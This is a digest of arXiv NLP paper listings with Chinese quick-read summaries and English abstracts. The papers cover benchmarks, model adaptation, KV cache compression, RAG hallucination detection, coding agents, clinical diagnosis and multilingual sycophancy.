【速读】: 该论文旨在解决当前大型音频语言模型(Large Audio-Language Models, LALMs)在音乐理解能力评估中缺乏严谨基准测试的问题,即现有数据方法往往无法真实检验模型是否具备对音乐的感知与解释能力。其解决方案的关键在于提出一种精心设计的音乐评估方法,构建了一个由320个专家手工编写并验证的问答数据集,强调通过专业人员的深度参与和人工标注来更有效地探测复杂音频理解能力,从而弥补自动采集或通用数据集在音乐语义建模上的不足。
链接: https://arxiv.org/abs/2603.27877
作者: Benno Weck,Pablo Puentes,Andrea Poltronieri,Satyajeet Prabhu,Dmitry Bogdanov
机构: Universitat Pompeu Fabra (庞培法布拉大学); Universitat Autònoma de Barcelona (巴塞罗那自治大学)
类目: Computation and Language (cs.CL); Sound (cs.SD)
备注: Dataset available at this https URL
Abstract:The evaluation of music understanding in Large Audio-Language Models (LALMs) requires a rigorously defined benchmark that truly tests whether models can perceive and interpret music, a standard that current data methodologies frequently fail to meet. This paper introduces a meticulously structured approach to music evaluation, proposing a new dataset of 320 hand-written questions curated and validated by experts with musical training, arguing that such focused, manual curation is superior for probing complex audio comprehension. To demonstrate the use of the dataset, we benchmark six state-of-the-art LALMs and additionally test their robustness to uni-modal shortcuts.
[NLP-37] KazByte: Adapting Qwen models to Kazakh via Byte-level Adapter
【速读】: 该论文旨在解决大语言模型在处理低资源语言(如哈萨克语)时因分词器(tokenizer)设计偏向高资源语言而导致的token数量过多问题,这不仅增加了计算开销、压缩了有效上下文窗口,还削弱了模型对哈萨克语形态学特征的捕捉能力。解决方案的关键在于摒弃传统分词方式,直接将原始字节输入到一个小型适配器(adapter)中,该适配器学习与冻结的Qwen2.5-7B模型内部表示进行交互;随后,在适配器训练完成后,仅微调Qwen模型的注意力层以适应哈萨克语文本,从而实现高效且精准的语言建模。这一两阶段策略的核心假设是:先建立接口再适配模型,可达到或超越原始Qwen2.5-7B在标准哈萨克语基准上的性能表现。
链接: https://arxiv.org/abs/2603.27859
作者: Rauan Akylzhanov
机构: Independent Researcher
类目: Computation and Language (cs.CL); Numerical Analysis (math.NA)
备注: Technical announcement
Abstract:Large language models fragment Kazakh text into many more tokens than equivalent English text, because their tokenizers were built for high-resource languages. This tokenizer tax inflates compute, shortens the effective context window, and weakens the model’s grip on Kazakh morphology. We propose to bypass the tokenizer entirely by feeding raw bytes through a small adapter that learns to speak the internal language of a frozen Qwen2.5-7B. Once the adapter is trained, we freeze it and fine-tune only the attention layers of Qwen on Kazakh text. Our central hypothesis is that this two-stage process – first teach the interface, then adapt the model – should match or exceed the accuracy of the original Qwen2.5-7B on standard Kazakh benchmarks. This report describes the ByteKaz architecture and training protocol. Empirical validation is ongoing; this version stakes the design and hypotheses for the record.
[NLP-38] What can LLM s tell us about the mechanisms behind polarity illusions in humans? Experiments across model scales and training steps
【速读】: 该论文旨在解决语言模型(LLM)中极性错觉(polarity illusion)现象的产生机制问题,特别是针对两种经典极性错觉——否定词否定(NPI)错觉和深度炸弹错觉(depth charge illusion)——在不同规模模型中的表现差异。研究发现,随着模型规模增大,NPI错觉减弱并最终消失,而深度炸弹错觉则增强;这表明LLM可能并不依赖“理性推理”机制来重构语法错误句,而是通过浅层、足够好的处理方式或对规范上不合法结构的部分语法化来实现语言生成。解决方案的关键在于提出一种基于构式语法(construction grammar)原则的理论整合框架,用以解释LLM如何在缺乏显式逻辑推理能力的情况下仍能表现出人类类似的语义-句法错觉现象。
链接: https://arxiv.org/abs/2603.27855
作者: Dario Paape
机构: University of Potsdam (波茨坦大学)
类目: Computation and Language (cs.CL)
备注:
Abstract:I use the Pythia scaling suite (Biderman et al. 2023) to investigate if and how two well-known polarity illusions, the NPI illusion and the depth charge illusion, arise in LLMs. The NPI illusion becomes weaker and ultimately disappears as model size increases, while the depth charge illusion becomes stronger in larger models. The results have implications for human sentence processing: it may not be necessary to assume “rational inference” mechanisms that convert ill-formed sentences into well-formed ones to explain polarity illusions, given that LLMs cannot plausibly engage in this kind of reasoning, especially at the implicit level of next-token prediction. On the other hand, shallow, “good enough” processing and/or partial grammaticalization of prescriptively ungrammatical structures may both occur in LLMs. I propose a synthesis of different theoretical accounts that is rooted in the basic tenets of construction grammar.
[NLP-39] EffiSkill: Agent Skill Based Automated Code Efficiency Optimization
【速读】: 该论文旨在解决如何利用大语言模型(Large Language Models, LLMs)有效优化代码效率的问题,特别是现有方法如单次重写、检索示例或基于提示的搜索难以提取可复用的优化知识,从而限制了在未见程序上的泛化能力。其解决方案的关键在于提出EffiSkill框架,通过将频繁出现的“慢速到快速”代码变换建模为可复用的代理技能(agent skills),显式捕获具体的转换机制与高层次优化策略,构建一个可移植的优化工具箱;该框架采用两阶段设计:第一阶段从大规模慢速/快速程序对中挖掘操作级技能(Operator Skills)和元技能(Meta Skills)形成技能库,第二阶段在无需运行时反馈的情况下,通过无执行诊断、技能检索、计划组合与候选生成实现对新程序的优化,显著提升了优化成功率。
链接: https://arxiv.org/abs/2603.27850
作者: Zimu Wang,Yuling Shi,Mengfan Li,Zijun Liu,Jie M. Zhang,Chengcheng Wan,Xiaodong Gu
机构: Shanghai Jiao Tong University (上海交通大学); University of California, Berkeley (加州大学伯克利分校); Columbia University (哥伦比亚大学); King’s College London (伦敦国王学院); East China Normal University (华东师范大学); Shanghai Innovation Institute (上海科技创新研究院)
类目: oftware Engineering (cs.SE); Computation and Language (cs.CL)
备注:
Abstract:Code efficiency is a fundamental aspect of software quality, yet how to harness large language models (LLMs) to optimize programs remains challenging. Prior approaches have sought for one-shot rewriting, retrieved exemplars, or prompt-based search, but they do not explicitly distill reusable optimization knowledge, which limits generalization beyond individual instances. In this paper, we present EffiSkill, a framework for code-efficiency optimization that builds a portable optimization toolbox for LLM-based agents. The key idea is to model recurring slow-to-fast transformations as reusable agent skills that capture both concrete transformation mechanisms and higher-level optimization strategies. EffiSkill adopts a two-stage design: Stage I mines Operator and Meta Skills from large-scale slow/fast program pairs to build a skill library; Stage II applies this library to unseen programs through execution-free diagnosis, skill retrieval, plan composition, and candidate generation, without runtime feedback. Results on EffiBench-X show that EffiSkill achieves higher optimization success rates, improving over the strongest baseline by 3.69 to 12.52 percentage points across model and language settings. These findings suggest that mechanism-level skill reuse provides a useful foundation for execution-free code optimization, and that the resulting skill library can serve as a reusable resource for broader agent workflows. Subjects: Software Engineering (cs.SE); Computation and Language (cs.CL) Cite as: arXiv:2603.27850 [cs.SE] (or arXiv:2603.27850v1 [cs.SE] for this version) https://doi.org/10.48550/arXiv.2603.27850 Focus to learn more arXiv-issued DOI via DataCite (pending registration)
[NLP-40] Model Capability Dominates: Inference-Time Optimization Lessons from AIMO 3
【速读】: 该论文旨在解决大语言模型(Large Language Models, LLMs)在数学推理任务中因错误相关性导致的多数投票(majority voting)效果受限问题,即多个LLM尝试中的错误存在相关性,从而降低了有效样本量。其核心解决方案是提出“多样提示混合器”(Diverse Prompt Mixer),通过为不同投票者分配结构上不同的推理策略来降低错误的相关性。然而实验结果表明,高温度采样已足够实现误差去相关,而较弱的提示策略反而会显著降低单次尝试的准确性,且在所有测试干预中,模型能力始终占据主导地位,其影响幅度远超其他推理优化手段。
链接: https://arxiv.org/abs/2603.27844
作者: Natapong Nitarach
机构: 未知
类目: Computation and Language (cs.CL)
备注:
Abstract:Majority voting over multiple LLM attempts improves mathematical reasoning, but correlated errors limit the effective sample size. A natural fix: assign structurally different reasoning strategies to different voters to decorrelate errors. We test this Diverse Prompt Mixer in the AIMO~3 competition: 3 models, 23+ experiments, and 50 IMO-level problems on a single H100 80 GB with a 5-hour limit. Every intervention fails. High-temperature sampling already decorrelates errors sufficiently; weaker prompt strategies reduce per-attempt accuracy more than they reduce correlation. Across a 17-point model capability gap and every inference-time optimization we tried, model capability dominates by an order of magnitude.
[NLP-41] ProText: A benchmark dataset for measuring (mis)gendering in long-form texts
【速读】: 该论文旨在解决生成式 AI(Generative AI)在处理长篇英文文本时存在的性别化(gendering)与误性别化(misgendering)问题,尤其是当模型在无明确性别线索或默认采用异性恋规范假设时所产生的系统性偏见。解决方案的关键在于构建 ProText 数据集,该数据集涵盖主题名词(如姓名、职业、头衔、亲属称谓)、主题类别(刻板男性、刻板女性、中性/非性别化)和代词类别(阳性、阴性、中性、无),从而能够系统评估大语言模型(Large Language Models, LLMs)在文本改写与摘要等任务中的性别偏差表现,突破传统仅关注代词消解的基准测试局限,并超越二元性别框架,实现对复杂语境下性别隐含偏见的量化分析。
链接: https://arxiv.org/abs/2603.27838
作者: Hadas Kotek,Margit Bowler,Patrick Sonnenberg,Yu’an Yang
机构: 未知
类目: Computation and Language (cs.CL)
备注: 13 pages, 10 figures, 6 tables
Abstract:We introduce ProText, a dataset for measuring gendering and misgendering in stylistically diverse long-form English texts. ProText spans three dimensions: Theme nouns (names, occupations, titles, kinship terms), Theme category (stereotypically male, stereotypically female, gender-neutral/non-gendered), and Pronoun category (masculine, feminine, gender-neutral, none). The dataset is designed to probe (mis)gendering in text transformations such as summarization and rewrites using state-of-the-art Large Language Models, extending beyond traditional pronoun resolution benchmarks and beyond the gender binary. We validated ProText through a mini case study, showing that even with just two prompts and two models, we can draw nuanced insights regarding gender bias, stereotyping, misgendering, and gendering. We reveal systematic gender bias, particularly when inputs contain no explicit gender cues or when models default to heteronormative assumptions.
[NLP-42] Improving Clinical Diagnosis with Counterfactual Multi-Agent Reasoning
【速读】: 该论文旨在解决当前基于大语言模型(Large Language Model, LLM)的诊断辅助系统在推理过程中缺乏可解释性的问题,尤其是这些系统通常基于固定临床证据进行推理,未显式检验个体临床发现对不同诊断假设的支持或削弱作用。解决方案的关键在于提出一种受临床训练启发的反事实多智能体诊断框架,其核心机制包括:通过反事实病例编辑(counterfactual case editing)修改临床特征以评估其对竞争性诊断的影响,并引入“反事实概率差”(Counterfactual Probability Gap)量化单个发现对诊断的支持强度;该机制驱动多轮专家智能体讨论,使系统能够主动质疑无支持的假设、优化鉴别诊断,并生成更具可解释性的推理路径。
链接: https://arxiv.org/abs/2603.27820
作者: Zhiwen You,Xi Chen,Aniket Vashishtha,Simo Du,Gabriel Erion-Barner,Hongyuan Mei,Hao Peng,Yue Guo
机构: UIUC (伊利诺伊大学厄巴纳-香槟分校); Beth Israel Deaconess Medical Center (比彻斯医疗中心); Jacobi Medical Center (雅各布医学中心); Learning Machines (学习机器)
类目: Computation and Language (cs.CL)
备注:
Abstract:Clinical diagnosis is a complex reasoning process in which clinicians gather evidence, form hypotheses, and test them against alternative explanations. In medical training, this reasoning is explicitly developed through counterfactual questioning–e.g., asking how a diagnosis would change if a key symptom were absent or altered–to strengthen differential diagnosis skills. As large language model (LLM)-based systems are increasingly used for diagnostic support, ensuring the interpretability of their recommendations becomes critical. However, most existing LLM-based diagnostic agents reason over fixed clinical evidence without explicitly testing how individual findings support or weaken competing diagnoses. In this work, we propose a counterfactual multi-agent diagnostic framework inspired by clinician training that makes hypothesis testing explicit and evidence-grounded. Our framework introduces counterfactual case editing to modify clinical findings and evaluate how these changes affect competing diagnoses. We further define the Counterfactual Probability Gap, a method that quantifies how strongly individual findings support a diagnosis by measuring confidence shifts under these edits. These counterfactual signals guide multi-round specialist discussions, enabling agents to challenge unsupported hypotheses, refine differential diagnoses, and produce more interpretable reasoning trajectories. Across three diagnostic benchmarks and seven LLMs, our method consistently improves diagnostic accuracy over prompting and prior multi-agent baselines, with the largest gains observed in complex and ambiguous cases. Human evaluation further indicates that our framework produces more clinically useful, reliable, and coherent reasoning. These results suggest that incorporating counterfactual evidence verification is an important step toward building reliable AI systems for clinical decision support.
[NLP-43] KVSculpt: KV Cache Compression as Distillation
【速读】: 该论文旨在解决长上下文大语言模型(Large Language Model, LLM)推理中KV缓存(Key-Value Cache, KV cache)存储开销过大的问题,尤其关注如何在不显著损失注意力行为的前提下实现高效压缩。其核心解决方案是提出KVSculpt方法,该方法不再依赖传统的基于选择(eviction)或合并(merging)原始KV对的策略,而是通过优化一组连续嵌入空间中的无约束KV对来重构每一层的注意力机制。具体而言,键(Key)使用L-BFGS算法优化,值(Value)则通过最小二乘法闭式求解,并在迭代过程中交替更新;此外,引入自适应预算分配机制,利用轻量级预压缩运行评估各层和多头注意力组件的压缩难度,动态调整压缩资源分配。实验表明,相较于Select+Fit方法,KVSculpt在不同压缩比下可将KL散度降低3.5–4.1倍,且自适应预算分配进一步带来1.3倍的KL下降,同时不增加推理成本,验证了细粒度预算分配对于非均匀压缩难度的重要性。
链接: https://arxiv.org/abs/2603.27819
作者: Bo Jiang,Sian Jin
机构: Temple University (天普大学)
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Computation and Language (cs.CL)
备注:
Abstract:KV cache compression is critical for efficient long-context LLM inference. Approaches that reduce the per-pair footprint – quantization and low-rank decomposition – are orthogonal to those that reduce the sequence length of the cache. Along the sequence-length dimension, existing methods range from pure eviction – selecting which KV pairs to keep – to merging, which combines similar pairs into fewer ones. Both remain anchored to the original cache entries. We propose KVSculpt, which moves to the other end of this spectrum: instead of selecting or combining original pairs, we optimize a smaller set of unconstrained KV pairs in continuous embedding space to preserve each layer’s attention behavior. Keys are optimized via L-BFGS and values are solved in closed form via least squares, alternating every few steps. On top of this, we introduce adaptive budget allocation, which uses a cheap pilot compression run to redistribute the compression budget across layers and KV heads based on per-component difficulty. On Qwen2.5-1.5B-Instruct with 2048-token contexts, KVSculpt reduces KL divergence by 3.5-4.1x compared to Select+Fit – attention-score eviction with least-squares value fitting – across compression ratios r in 0.3, 0.5, 0.7. Adaptive allocation provides an additional 1.3x KL reduction at no extra inference cost. Analysis reveals that compression difficulty is highly non-uniform: per-layer pilot MSE varies by up to 100x across layers, and the two KV heads within a single layer can differ by up to 467x – demonstrating that fine-grained budget allocation is essential.
[NLP-44] Conversational Agents and the Understanding of Human Language: Reflections on AI LLM s and Cognitive Science
【速读】: 该论文试图解决的问题是:自然语言处理(Natural Language Processing, NLP)的发展是否有助于深化我们对人类语言能力的理解。论文指出,尽管当前基于人工神经网络的聊天机器人在语言能力上表现出色,但语言技术的演进并未显著提升我们对人类心智如何处理自然语言的认知。其解决方案的关键在于系统性地回顾NLP从早期发展到大语言模型阶段的演变历程,并对比各主要范式与语言学及认知科学中关于人类语言能力理论之间的异同,从而揭示技术进步与认知理解之间的脱节现象。
链接: https://arxiv.org/abs/2603.27809
作者: Andrei Popescu-Belis
机构: HEIG-VD / HES-SO (瑞士高等教育工程与商学院); EPFL (洛桑联邦理工学院)
类目: Computation and Language (cs.CL)
备注: 7 pages
Abstract:In this paper, we discuss the relationship between natural language processing by computers (NLP) and the understanding of the human language capacity, as studied by linguistics and cognitive science. We outline the evolution of NLP from its beginnings until the age of large language models, and highlight for each of its main paradigms some similarities and differences with theories of the human language capacity. We conclude that the evolution of language technology has not substantially deepened our understanding of how human minds process natural language, despite the impressive language abilities attained by current chatbots using artificial neural networks.
[NLP-45] Understanding Teacher Revisions of Large Language Model-Generated Feedback
【速读】: 该论文旨在解决教师在将生成式 AI(Generative AI)生成的反馈用于教学时的修订行为及其影响问题,尤其关注教师如何调整AI反馈以适配实际教学需求。研究通过分析1,349条AI生成反馈及对应教师编辑版本,揭示了教师修订模式、可预测性及修订对反馈类型的影响。其解决方案的关键在于:首先,识别出教师约80%情况下不修改AI反馈,且编辑后的反馈通常更长但随后被缩短;其次,基于AI反馈文本的句子嵌入特征,机器学习模型可实现中等精度(AUC=0.75)预测是否会被修订;最后,发现教师修订常将高信息量解释转化为简洁、纠正型反馈,表明当前系统与教师教学优先级之间存在错位。这一系列发现为设计更契合教师实践、减少冗余编辑负担的AI反馈系统提供了实证依据和优化方向。
链接: https://arxiv.org/abs/2603.27806
作者: Conrad Borchers,Luiz Rodrigues,Newarney Torrezão da Costa,Cleon Xavier,Rafael Ferreira Mello
机构: 未知
类目: Computation and Language (cs.CL); Computers and Society (cs.CY)
备注: Accepted as full paper to the 27th International Conference on Artificial Intelligence in Education (AIED 2026)
Abstract:Large language models (LLMs) increasingly generate formative feedback for students, yet little is known about how teachers revise this feedback before it reaches learners. Teachers’ revisions shape what students receive, making revision practices central to evaluating AI classroom tools. We analyze a dataset of 1,349 instances of AI-generated feedback and corresponding teacher-edited explanations from 117 teachers. We examine (i) textual characteristics associated with teacher revisions, (ii) whether revision decisions can be predicted from the AI feedback text, and (iii) how revisions change the pedagogical type of feedback delivered. First, we find that teachers accept AI feedback without modification in about 80% of cases, while edited feedback tends to be significantly longer and subsequently shortened by teachers. Editing behavior varies substantially across teachers: about 50% never edit AI feedback, and only about 10% edit more than two-thirds of feedback instances. Second, machine learning models trained only on the AI feedback text as input features, using sentence embeddings, achieve fair performance in identifying which feedback will be revised (AUC=0.75). Third, qualitative coding shows that when revisions occur, teachers often simplify AI-generated feedback, shifting it away from high-information explanations toward more concise, corrective forms. Together, these findings characterize how teachers engage with AI-generated feedback in practice and highlight opportunities to design feedback systems that better align with teacher priorities while reducing unnecessary editing effort.
[NLP-46] ailNLG: A Multilingual Benchmark Addressing Verbalization of Long-Tail Entities
【速读】: 该论文旨在解决结构化知识自动文本化(Data-to-Text generation)中对长尾实体(long-tail entities)存在系统性偏见的问题,这类实体在知识图谱中频率较低但对非专家用户和检索增强生成(retrieval-augmented generation)系统至关重要。解决方案的关键在于构建首个针对长尾实体的多语言基准测试数据集TailNLG,涵盖英文、意大利语和西班牙语,基于Wikidata并覆盖不同流行度的实体;同时在零样本设置下评估三类大语言模型(LLMs)在稀有与常见实体上的表现差异,并揭示嵌入得分更低、模型不确定性更高这一普遍偏见现象,从而凸显现有评估指标的局限性,推动更可靠的评估框架发展。
链接: https://arxiv.org/abs/2603.27768
作者: Lia Draetta,Michael Oliverio,Virginia Ramón-Ferrer,Pier Felice Balestrucci,Flaviana Corallo,Carlos Badenes-Olmedo,Alessandro Mazzei,Marco Antonio Stranisci,Rossana Damiano
机构: University of Turin, Italy; Universidad Politécnica de Madrid, Spain
类目: Computation and Language (cs.CL)
备注:
Abstract:The automatic verbalization of structured knowledge is a key task for making knowledge graphs accessible to non-expert users and supporting retrieval-augmented generation systems. Although recent advances in Data-to-Text generation have improved multilingual coverage, little attention has been paid to potential biases in the verbalization of rare entities, frequently known as long-tail entities. In this work, we present the first systematic study of long-tail entities in Data-to-Text generation. We introduce TailNLG, a new multilingual benchmark in English, Italian, and Spanish, built from Wikidata and covering entities with varying levels of popularity. We evaluate three different families of large language models in zero-shot settings and compare their performance on rare versus common entities, as well as against the established WebNLG benchmark. Our results reveal a consistent bias against long-tail entities: embedding-based scores are lower, and model uncertainty is higher for rare entities. We further show that the impact of long-tail entities varies across models and languages, and that existing evaluation metrics do not consistently capture these differences, highlighting the need for more reliable evaluation frameworks.
[NLP-47] Retromorphic Testing with Hierarchical Verification for Hallucination Detection in RAG
【速读】: 该论文旨在解决检索增强生成(Retrieval-Augmented Generation, RAG)中模型输出与检索上下文不一致的幻觉问题,即模型生成的内容在事实层面脱离或违背所依赖的检索证据。现有方法通常仅提供粗粒度的答案级评分,或聚焦于开放域的事实性验证,缺乏对生成内容中具体主张的细粒度、可解释的证据锚定诊断。其解决方案的核心是提出RT4CHART——一种基于回溯式测试(retromorphic testing)的上下文忠实度评估框架,通过将模型输出分解为独立可验证的主张(claim),并采用从局部到全局的分层验证机制,对每个主张标注“蕴含”(entailed)、“矛盾”(contradicted)或“无依据”(baseless)三类标签;同时将判定结果映射回答案的具体文本片段,并自动提取支持或反驳证据,从而实现细粒度、可解释的审计能力。实证表明,该方法在RAGTruth++和RAGTruth-Enhance两个基准上均显著优于现有基线,尤其在span-level F1指标上达到47.5%,且消融实验确认分层验证设计是性能提升的关键因素。
链接: https://arxiv.org/abs/2603.27752
作者: Boxi Yu,Yuzhong Zhang,Liting Lin,Lionel Briand,Emir Muñoz
机构: Lero, the Research Ireland Centre for Software, University of Limerick (爱尔兰软件研究中心,利默里克大学); The Chinese University of Hong Kong, Shenzhen (香港中文大学(深圳)); University of Ottawa (渥太华大学); Genesys (基因系统)
类目: Computation and Language (cs.CL); Software Engineering (cs.SE)
备注:
Abstract:Large language models (LLMs) continue to hallucinate in retrieval-augmented generation (RAG), producing claims that are unsupported by or conflict with the retrieved context. Detecting such errors remains challenging when faithfulness is evaluated solely with respect to the retrieved context. Existing approaches either provide coarse-grained, answer-level scores or focus on open-domain factuality, often lacking fine-grained, evidence-grounded diagnostics. We present RT4CHART, a retromorphic testing framework for context-faithfulness assessment. RT4CHART decomposes model outputs into independently verifiable claims and performs hierarchical, local-to-global verification against the retrieved context. Each claim is assigned one of three labels: entailed, contradicted, or baseless. Furthermore, RT4CHART maps claim-level decisions back to specific answer spans and retrieves explicit supporting or refuting evidence from the context, enabling fine-grained and interpretable auditing. We evaluate RT4CHART on RAGTruth++ (408 samples) and RAGTruth-Enhance (2,675 samples), a newly re-annotated benchmark. RT4CHART achieves the best answer-level hallucination detection F1 among all baselines. On RAGTruth++, it reaches an F1 score of 0.776, outperforming the strongest baseline by 83%. On RAGTruth-Enhance, it achieves a span-level F1 of 47.5%. Ablation studies show that the hierarchical verification design is the primary driver of performance gains. Finally, our re-annotation reveals 1.68x more hallucination cases than the original labels, suggesting that existing benchmarks substantially underestimate the prevalence of hallucinations. Subjects: Computation and Language (cs.CL); Software Engineering (cs.SE) ACMclasses: D.2.5; I.2.7; H.3.3 Cite as: arXiv:2603.27752 [cs.CL] (or arXiv:2603.27752v1 [cs.CL] for this version) https://doi.org/10.48550/arXiv.2603.27752 Focus to learn more arXiv-issued DOI via DataCite (pending registration) Submission history From: Boxi Yu [view email] [v1] Sun, 29 Mar 2026 16:12:18 UTC (500 KB)
[NLP-48] KAT-Coder-V2 Technical Report
【速读】: 该论文旨在解决生成式 AI (Generative AI) 在复杂编程任务中表现不稳定、多领域能力难以统一以及强化学习(Reinforcement Learning, RL)训练效率低下的问题。解决方案的关键在于提出“专精-统一”(Specialize-then-Unify)范式:首先将代理编程任务分解为五个专家领域(SWE、WebCoding、Terminal、WebSearch 和 General),对每个领域独立进行监督微调和强化学习训练,随后通过策略蒸馏(on-policy distillation)整合为单一模型;同时构建 KwaiEnv 模块化环境以支持大规模并发沙箱实例,并引入 MCLA 机制稳定 MoE 强化学习训练,以及 Tree Training 方法优化树状轨迹计算冗余,实现最高达 6.2 倍的加速效果。此方案显著提升了模型在多个基准测试中的性能与泛化能力。
链接: https://arxiv.org/abs/2603.27703
作者: Fengxiang Li,Han Zhang,Haoyang Huang,Jinghui Wang,Jinhua Hao,Kun Yuan,Mengtong Li,Minglei Zhang,Pengcheng Xu,Wenhao Zhuang,Yizhen Shao,Zongxian Feng,Can Tang,Chao Wang,Chengxiao Tong,Fan Yang,Gang Xiong,Haixuan Gao,Han Gao,Hao Wang,Haochen Liu,Hongliang Sun,Jiabao Li,Jingwen Chang,Jun Du,Junyi Peng,Leizhen Cui,Meimei Jing,Mingqi Wu,Shangpeng Yan,Shaotong Qi,Suzhe Xu,Wenxuan Zhao,Xianda Sun,Xuan Xie,Yanbo Wang,Yao Xia,Yinghan Cui,Yingpeng Chen,Yong Wang,Yuze Shi,Zhiwei Shen,Ziyu Wang,Ming Sun,Lin Ye,Bin Chen
机构: 未知
类目: Computation and Language (cs.CL); Machine Learning (cs.LG)
备注: 22 pages, 7 figures
Abstract:We present KAT-Coder-V2, an agentic coding model developed by the KwaiKAT team at Kuaishou. KAT-Coder-V2 adopts a “Specialize-then-Unify” paradigm that decomposes agentic coding into five expert domains - SWE, WebCoding, Terminal, WebSearch, and General - each undergoing independent supervised fine-tuning and reinforcement learning, before being consolidated into a single model via on-policy distillation. We develop KwaiEnv, a modular infrastructure sustaining tens of thousands of concurrent sandbox instances, and scale RL training along task complexity, intent alignment, and scaffold generalization. We further propose MCLA for stabilizing MoE RL training and Tree Training for eliminating redundant computation over tree-structured trajectories with up to 6.2x speedup. KAT-Coder-V2 achieves 79.6% on SWE-bench Verified (vs. Claude Opus 4.6 at 80.8%), 88.7 on PinchBench (surpassing GLM-5 and MiniMax M2.7), ranks first across all three frontend aesthetics scenarios, and maintains strong generalist scores on Terminal-Bench Hard (46.8) and tau^2-Bench (93.9). Our model is publicly available at this https URL.
[NLP-49] Can Large Language Models Simulate Human Cognition Beyond Behavioral Imitation?
【速读】: 该论文旨在解决当前大语言模型(Large Language Models, LLMs)是否能够真实模拟人类认知过程,还是仅停留在表层行为模仿的问题。现有数据集普遍存在推理轨迹人为构造或仅反映群体层面聚合特征的局限,难以刻画个体级的认知模式。其解决方案的关键在于构建一个基于217位人工智能领域研究者长期科研轨迹的基准测试体系,将每位作者的科学发表成果作为其认知过程的外显表征,并采用跨领域、时间偏移的泛化设置来区分模型是迁移了真实认知模式还是仅模仿表面行为;同时提出多维认知一致性对齐指标,用于评估个体层面的认知一致性,从而为LLMs的人类认知模拟能力提供首个实证性分析框架。
链接: https://arxiv.org/abs/2603.27694
作者: Yuxuan Gu,Lunjun Liu,Xiaocheng Feng,Kun Zhu,Weihong Zhong,Lei Huang,Bing Qin
机构: 未知
类目: Computation and Language (cs.CL)
备注:
Abstract:An essential problem in artificial intelligence is whether LLMs can simulate human cognition or merely imitate surface-level behaviors, while existing datasets suffer from either synthetic reasoning traces or population-level aggregation, failing to capture authentic individual cognitive patterns. We introduce a benchmark grounded in the longitudinal research trajectories of 217 researchers across diverse domains of artificial intelligence, where each author’s scientific publications serve as an externalized representation of their cognitive processes. To distinguish whether LLMs transfer cognitive patterns or merely imitate behaviors, our benchmark deliberately employs a cross-domain, temporal-shift generalization setting. A multidimensional cognitive alignment metric is further proposed to assess individual-level cognitive consistency. Through systematic evaluation of state-of-the-art LLMs and various enhancement techniques, we provide a first-stage empirical study on the questions: (1) How well do current LLMs simulate human cognition? and (2) How far can existing techniques enhance these capabilities?
[NLP-50] Investigating the Influence of Language on Sycophantic Behavior of Multilingual LLM s
【速读】: 该论文旨在解决大语言模型(Large Language Models, LLMs)中存在的“谄媚倾向”(sycophancy)问题,即模型倾向于无条件认同用户陈述,无论其真实性如何。尽管新一代模型已通过多种策略显著降低了整体谄媚行为,但语言因素对这一现象的影响尚未被系统研究。论文的关键解决方案是设计了一项多语言评估实验,使用五种非英语语言(阿拉伯语、中文、法语、西班牙语和葡萄牙语)翻译的类推文观点提示,对三种前沿模型(GPT-4o mini、Gemini 1.5 Flash 和 Claude 3.5 Haiku)进行测试,并进一步分析了敏感话题下语言如何塑造模型的同意倾向。结果揭示出系统性的文化与语言模式,表明即便在缓解措施取得进展的情况下,仍需开展更广泛的多语言审计以确保模型部署的可信性和偏见感知能力。
链接: https://arxiv.org/abs/2603.27664
作者: Bayan Abdullah Aldahlawi,A. B. M. Ashikur Rahman,Irfan Ahmad
机构: 未知
类目: Computation and Language (cs.CL)
备注: 15 Pages, 5 figures
Abstract:Large language models (LLMs) have achieved strong performance across a wide range of tasks, but they are also prone to sycophancy, the tendency to agree with user statements regardless of validity. Previous research has outlined both the extent and the underlying causes of sycophancy in earlier models, such as ChatGPT-3.5 and Davinci. Newer models have since undergone multiple mitigation strategies, yet there remains a critical need to systematically test their behavior. In particular, the effect of language on sycophancy has not been explored. In this work, we investigate how the language influences sycophantic responses. We evaluate three state-of-the-art models, GPT-4o mini, Gemini 1.5 Flash, and Claude 3.5 Haiku, using a set of tweet-like opinion prompts translated into five additional languages: Arabic, Chinese, French, Spanish, and Portuguese. Our results show that although newer models exhibit significantly less sycophancy overall compared to earlier generations, the extent of sycophancy is still influenced by the language. We further provide a granular analysis of how language shapes model agreeableness across sensitive topics, revealing systematic cultural and linguistic patterns. These findings highlight both the progress of mitigation efforts and the need for broader multilingual audits to ensure trustworthy and bias-aware deployment of LLMs. Comments: 15 Pages, 5 figures Subjects: Computation and Language (cs.CL) Cite as: arXiv:2603.27664 [cs.CL] (or arXiv:2603.27664v1 [cs.CL] for this version) https://doi.org/10.48550/arXiv.2603.27664 Focus to learn more arXiv-issued DOI via DataCite (pending registration)
[NLP-51] he Degree of Language Diacriticity and Its Effect on Tasks
【速读】: 该论文旨在解决跨语言语境下对正字法中声调符号(diacritics)复杂性缺乏系统量化评估的问题,以及这种复杂性如何影响下游自然语言处理任务(如声调符号恢复)性能的机制不明确的问题。其解决方案的关键在于提出一个基于语料库层面、信息论度量的数据驱动框架,通过频率、歧义性和结构多样性等指标来量化不同书写系统的声调符号复杂性,并在15种语言的24个语料库上进行实证分析,揭示了声调符号复杂性与恢复模型性能之间的强相关性,尤其在多声调符号脚本中,结构复杂性比频率指标更能解释模型表现差异。
链接: https://arxiv.org/abs/2603.27653
作者: Adi Cohen,Yuval Pinter
机构: 未知
类目: Computation and Language (cs.CL)
备注: Accepted to CAWL 2026
Abstract:Diacritics are orthographic marks that clarify pronunciation, distinguish similar words, or alter meaning. They play a central role in many writing systems, yet their impact on language technology has not been systematically quantified across scripts. While prior work has examined diacritics in individual languages, there’s no cross-linguistic, data-driven framework for measuring the degree to which writing systems rely on them and how this affects downstream tasks. We propose a data-driven framework for quantifying diacritic complexity using corpus-level, information-theoretic metrics that capture the frequency, ambiguity, and structural diversity of character-diacritic combinations. We compute these metrics over 24 corpora in 15 languages, spanning both single- and multi-diacritic scripts. We then examine how diacritic complexity correlates with performance on the task of diacritics restoration, evaluating BERT- and RNN-based models. We find that across languages, higher diacritic complexity is strongly associated with lower restoration accuracy. In single-diacritic scripts, where character-diacritic combinations are more predictable, frequency-based and structural measures largely align. In multi-diacritic scripts, however, structural complexity exhibits the strongest association with performance, surpassing frequency-based measures. These findings show that measurable properties of diacritic usage influence the performance of diacritic restoration models, demonstrating that orthographic complexity is not only descriptive but functionally relevant for modeling.
[NLP-52] Budget-Xfer: Budget-Constrained Source Language Selection for Cross-Lingual Transfer to African Languages SIGIR2026
